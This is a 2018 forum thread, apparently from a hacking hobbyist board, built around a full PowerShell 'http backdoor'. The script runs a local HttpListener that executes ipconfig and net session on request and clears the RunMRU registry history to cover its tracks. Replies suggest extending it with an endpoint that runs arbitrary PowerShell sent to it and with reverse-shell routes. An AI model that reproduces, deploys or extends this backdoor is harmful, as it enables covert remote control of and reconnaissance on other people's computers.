jOte- Posted March 26, 2018 Posted March 26, 2018 ############## powershell http backdoor... $cHOST= 'localhost'; # '0.0.0.0' needs admin $cPORT= 8080; $URL = "http://$($cHOST):$($cPORT)/"; $ROUTES = @{ "GET /exit" = { EXIT }; "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; "GET /ipconfig" = { return "$(& ipconfig 2>&1 | Out-String)" }; "GET /ipconfigall" = { return "$(& ipconfig /all 2>&1 | Out-String)" }; "GET /trol/flipscreen" = { return "flipscreen" }; "GET /trol/switchmousebuttons" = { return "switchmousebuttons" } } $LISTENER = New-Object System.Net.HttpListener; $LISTENER.Prefixes.Add($URL); $LISTENER.Start(); While ($LISTENER.IsListening) { If ($START -eq $null) { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue $START=1 } $CONTEXT = $LISTENER.GetContext(); $REQUEST = $CONTEXT.Request; $RESPONSE = $CONTEXT.Response; $RECEIVED = '{0} {1}' -f $REQUEST.httpMethod, $REQUEST.Url.LocalPath; $ROUTE = $ROUTES.Get_Item($RECEIVED); If ($ROUTE -eq $null) { $RESPONSE.StatusCode = 404; } Else { $CONTENT = & $($ROUTE); $CONTENT = "<pre>$($CONTENT)</pre>"; $BUFFER = [System.Text.Encoding]::UTF8.GetBytes($CONTENT); $RESPONSE.ContentLength64 = $BUFFER.Length; $RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length); } $RESPONSE.Close(); }
jOte- Posted March 26, 2018 Author Posted March 26, 2018 this is just a proof of concept... im not intending to send full scripts....
Dave-ee Jones Posted March 26, 2018 Posted March 26, 2018 3 hours ago, jOte- said: ############## powershell http backdoor... Looks interesting. 2 hours ago, jOte- said: this is just a proof of concept... im not intending to send full scripts.... Okay. 1 hour ago, jOte- said: some ppl will understand.... Yes. 1 hour ago, jOte- said: BTW... who is that "thehappydinoa" noob??? KIlling my entries with his stupid questions... No idea.
PoSHMagiC0de Posted March 27, 2018 Posted March 27, 2018 Hmm, a dirty web server as a malicious service. I been experimenting with using httplistener in Powershell as a PSJob to get payload jobs from. Never thought about using it the way you use it because normally binding to a port in windows requires admin. Do not know if that applies only to ports < 1024. To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)
Dave-ee Jones Posted March 28, 2018 Posted March 28, 2018 9 hours ago, PoSHMagiC0de said: To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-) On 3/27/2018 at 6:11 AM, jOte- said: "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; He has a URL to check for admin or not, however since I don't have the rest of his code I can't tell what else it's doing there. I knew you would bring up psh. :P If cmd, why not psh? Having some other commands like.. GET /ispsh GET /reversepsh GET /sendpsh even with a CLI tool on it would be interesting.
PoSHMagiC0de Posted March 28, 2018 Posted March 28, 2018 Of course, if it is psh, I may come a callin. :-) Actually what I meant for admin check was when running the backdoor it checks if it is being ran with enough permission to open the port. That admin check he is using session for could be in powershell for more accurate results.
jOte- Posted March 29, 2018 Author Posted March 29, 2018 https://github.com/SpiderLabs/portia/blob/master/modules/Start-WebServer.ps1 check this out!!!!
Recommended Posts
Archived
This topic is now archived and is closed to further replies.